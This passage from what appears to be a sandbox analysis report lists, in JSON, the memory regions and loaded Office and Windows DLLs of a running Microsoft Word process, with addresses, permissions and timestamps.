"ref_process_dump": null, "size": 4194304, "start_va": 113180672, "type": "region", "version": 1 }, "end_va": 117374975, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x0000000006bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 113180672, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 117440512, "type": "region", "version": 1 }, "end_va": 118489087, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x0000000007000000", "norm_filename": null, "region_type": "private_memory", "start_va": 117440512, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 119996416, "type": "region", "version": 1 }, "end_va": 120520703, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000007270000", "norm_filename": null, "region_type": "private_memory", "start_va": 119996416, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 120520704, "type": "region", "version": 1 }, "end_va": 128909311, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x00000000072f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 120520704, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 128909312, "type": "region", "version": 1 }, "end_va": 133107711, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x0000000007af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 128909312, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 133169152, "type": "region", "version": 1 }, "end_va": 137367551, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000007f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 133169152, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 137428992, "type": "region", "version": 1 }, "end_va": 141627391, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x0000000008310000", "norm_filename": null, "region_type": "private_memory", "start_va": 137428992, "timestamp": "00:00:10.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 141688832, "type": "region", "version": 1 }, "end_va": 143785983, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x0000000008720000", "norm_filename": null, "region_type": "private_memory", "start_va": 141688832, "timestamp": "00:00:10.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 143785984, "type": "region", "version": 1 }, "end_va": 148766719, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x0000000008920000", "norm_filename": null, "region_type": "private_memory", "start_va": 143785984, "timestamp": "00:00:10.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 148766720, "type": "region", "version": 1 }, "end_va": 152961023, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x0000000008de0000", "norm_filename": null, "region_type": "private_memory", "start_va": 148766720, "timestamp": "00:00:10.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 921174016, "type": "region", "version": 1 }, "end_va": 921239551, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x0000000036e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 921174016, "timestamp": "00:00:10.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1878982656, "type": "region", "version": 1 }, "end_va": 1879048191, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x000000006fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1878982656, "timestamp": "00:00:10.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 208896, "start_va": 1950941184, "type": "region", "version": 1 }, "end_va": 1951150079, "entry_point": 1950941184, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_232", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1950941184, "timestamp": "00:00:10.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 1994850304, "filename": "\\Windows\\System32\\user32.dll", "id": "region_233", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1994850304, "timestamp": "00:00:10.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 1995898880, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_234", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995898880, "timestamp": "00:00:10.114", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_235", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:10.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1998979072, "type": "region", "version": 1 }, "end_va": 1999007743, "entry_point": 1998979072, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_236", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1998979072, "timestamp": "00:00:10.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_237", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:10.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:10.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_239", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:10.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1945600, "start_va": 5368381440, "type": "region", "version": 1 }, "end_va": 5370327039, "entry_point": 5368381440, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "id": "region_240", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "region_type": "memory_mapped_file", "start_va": 5368381440, "timestamp": "00:00:10.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 8790700589056, "type": "region", "version": 1 }, "end_va": 8790700654591, "entry_point": 0, "filename": null, "id": "region_241", "name": "private_0x000007febe960000", "norm_filename": null, "region_type": "private_memory", "start_va": 8790700589056, "timestamp": "00:00:10.373", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 237568, "start_va": 8791322132480, "type": "region", "version": 1 }, "end_va": 8791322370047, "entry_point": 8791322174904, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll", "id": "region_242", "name": "onbttnwd.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll", "region_type": "memory_mapped_file", "start_va": 8791322132480, "timestamp": "00:00:10.373", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11505664, "start_va": 8791322394624, "type": "region", "version": 1 }, "end_va": 8791333900287, "entry_point": 8791322394624, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL", "id": "region_243", "name": "chart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\chart.dll", "region_type": "memory_mapped_file", "start_va": 8791322394624, "timestamp": "00:00:10.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2240512, "start_va": 8791333928960, "type": "region", "version": 1 }, "end_va": 8791336169471, "entry_point": 8791333928960, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL", "id": "region_244", "name": "riched20.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 8791333928960, "timestamp": "00:00:10.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791337467904, "type": "region", "version": 1 }, "end_va": 8791338094591, "entry_point": 8791337467904, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_245", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791337467904, "timestamp": "00:00:10.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1564672, "start_va": 8791338582016, "type": "region", "version": 1 }, "end_va": 8791340146687, "entry_point": 8791338582016, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_246", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 8791338582016, "timestamp": "00:00:10.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1900544, "start_va": 8791340154880, "type": "region", "version": 1 }, "end_va": 8791342055423, "entry_point": 8791340154880, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_247", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 8791340154880, "timestamp": "00:00:10.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1507328, "start_va": 8791342055424, "type": "region", "version": 1 }, "end_va": 8791343562751, "entry_point": 8791342055424, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL", "id": "region_248", "name": "msptls.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 8791342055424, "timestamp": "00:00:10.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1552384, "start_va": 8791343562752, "type": "region", "version": 1 }, "end_va": 8791345115135, "entry_point": 8791343562752, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL", "id": "region_249", "name": "msointl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 8791343562752, "timestamp": "00:00:10.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 770048, "start_va": 8791345135616, "type": "region", "version": 1 }, "end_va": 8791345905663, "entry_point": 8791345135616, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL", "id": "region_250", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 8791345135616, "timestamp": "00:00:10.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 82046976, "start_va": 8791345922048, "type": "region", "version": 1 }, "end_va": 8791427969023, "entry_point": 8791345922048, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL", "id": "region_251", "name": "msores.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll", "region_type": "memory_mapped_file", "start_va": 8791345922048, "timestamp": "00:00:10.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9572352, "start_va": 8791427973120, "type": "region", "version": 1 }, "end_va": 8791437545471, "entry_point": 8791427973120, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL", "id": "region_252", "name": "mso99lres.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll", "region_type": "memory_mapped_file", "start_va": 8791427973120, "timestamp": "00:00:10.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3178496, "start_va": 8791437606912, "type": "region", "version": 1 }, "end_va": 8791440785407, "entry_point": 8791437606912, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL", "id": "region_253", "name": "mso40uires.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll", "region_type": "memory_mapped_file", "start_va": 8791437606912, "timestamp": "00:00:10.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 19775488, "start_va": 8791440818176, "type": "region", "version": 1 }, "end_va": 8791460593663, "entry_point": 8791440818176, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL", "id": "region_254", "name": "mso.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll", "region_type": "memory_mapped_file", "start_va": 8791440818176, "timestamp": "00:00:10.487", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8175616, "start_va": 8791460610048, "type": "region", "version": 1 }, "end_va": 8791468785663, "entry_point": 8791460610048, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll", "id": "region_255", "name": "mso99lwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lwin32client.dll", "region_type": "memory_mapped_file", "start_va": 8791460610048, "timestamp": "00:00:10.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9351168, "start_va": 8791468802048, "type": "region", "version": 1 }, "end_va": 8791478153215, "entry_point": 8791468802048, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll", "id": "region_256", "name": "mso40uiwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll", "region_type": "memory_mapped_file", "start_va": 8791468802048, "timestamp": "00:00:10.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4685824, "start_va": 8791478173696, "type": "region", "version": 1 }, "end_va": 8791482859519, "entry_point": 8791478173696, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll", "id": "region_257", "name": "mso30win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll", "region_type": "memory_mapped_file", "start_va": 8791478173696, "timestamp": "00:00:10.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3162112, "start_va": 8791482892288, "type": "region", "version": 1 }, "end_va": 8791486054399, "entry_point": 8791482892288, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll", "id": "region_258", "name": "mso20win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll", "region_type": "memory_mapped_file", "start_va": 8791482892288, "timestamp": "00:00:10.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 18268160, "start_va": 8791486103552, "type": "region", "version": 1 }, "end_va": 8791504371711, "entry_point": 8791486103552, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL", "id": "region_259", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\oart.dll", "region_type": "memory_mapped_file", "start_va": 8791486103552, "timestamp": "00:00:10.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 811008, "start_va": 8791504388096, "type": "region", "version": 1 }, "end_va": 8791505199103, "entry_point": 8791504388096, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_260", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 8791504388096, "timestamp": "00:00:10.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 37351424, "start_va": 8791505240064, "type": "region", "version": 1 }, "end_va": 8791542591487, "entry_point": 8791505240064, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL", "id": "region_261", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 8791505240064, "timestamp": "00:00:10.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791547445248, "type": "region", "version": 1 }, "end_va": 8791547899903, "entry_point": 8791547445248, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_262", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791547445248, "timestamp": "00:00:10.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791547904000, "type": "region", "version": 1 }, "end_va": 8791548063743, "entry_point": 8791547904000, "filename": "\\Windows\\System32\\sppc.dll", "id": "region_263", "name": "sppc.dll", "norm_filename": "c:\\windows\\system32\\sppc.dll", "region_type": "memory_mapped_file", "start_va": 8791547904000, "timestamp": "00:00:10.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791548100608, "type": "region", "version": 1 }, "end_va": 8791548342271, "entry_point": 8791548100608, "filename": "\\Windows\\System32\\mlang.dll", "id": "region_264", "name": "mlang.dll", "norm_filename": "c:\\windows\\system32\\mlang.dll", "region_type": "memory_mapped_file", "start_va": 8791548100608, "timestamp": "00:00:10.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791587815424, "type": "region", "version": 1 }, "end_va": 8791587864575, "entry_point": 8791587815424, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_265", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791587815424, "timestamp": "00:00:10.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791592206336, "type": "region", "version": 1 }, "end_va": 8791592218623, "entry_point": 8791592206336, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll", "id": "region_266", "name": "api-ms-win-core-file-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791592206336, "timestamp": "00:00:10.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791592271872, "type": "region", "version": 1 }, "end_va": 8791592284159, "entry_point": 8791592271872, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll", "id": "region_267", "name": "api-ms-win-core-processthreads-l1-1-1.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll", "region_type": "memory_mapped_file", "start_va": 8791592271872, "timestamp": "00:00:10.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791594172416, "type": "region", "version": 1 }, "end_va": 8791594184703, "entry_point": 8791594172416, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll", "id": "region_268", "name": "api-ms-win-core-synch-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791594172416, "timestamp": "00:00:10.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791594237952, "type": "region", "version": 1 }, "end_va": 8791594250239, "entry_point": 8791594237952, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll", "id": "region_269", "name": "api-ms-win-core-localization-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791594237952, "timestamp": "00:00:10.651", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791594303488, "type": "region", "version": 1 }, "end_va": 8791594315775, "entry_point": 8791594303488, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll", "id": "region_270", "name": "api-ms-win-core-file-l2-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll", "region_type": "memory_mapped_file", "start_va": 8791594303488, "timestamp": "00:00:10.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791594369024, "type": "region", "version": 1 }, "end_va": 8791594381311, "entry_point": 8791594369024, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll", "id": "region_271", "name": "api-ms-win-core-timezone-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 8791594369024, "timestamp": "00:00:10.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 991232, "start_va": 8791594434560, "type": "region", "version": 1 }, "end_va": 8791595425791, "entry_point": 8791594434560, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll", "id": "region_272", "name": "ucrtbase.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll", "region_type": "memory_mapped_file", "start_va": 8791594434560, "timestamp": "00:00:10.672", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791595483136, "type": "region", "version": 1 }, "end_va": 8791595511807, "entry_point": 8791595483136, "filename": "\\Windows\\System32\\msimg32.dll", "id": "region_273", "name": "msimg32.dll", "norm_filename": "c:\\windows\\system32\\msimg32.dll", "region_type": "memory_mapped_file", "start_va": 8791595483136, "timestamp": "00:00:10.697", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1216512, "start_va": 8791595548672, 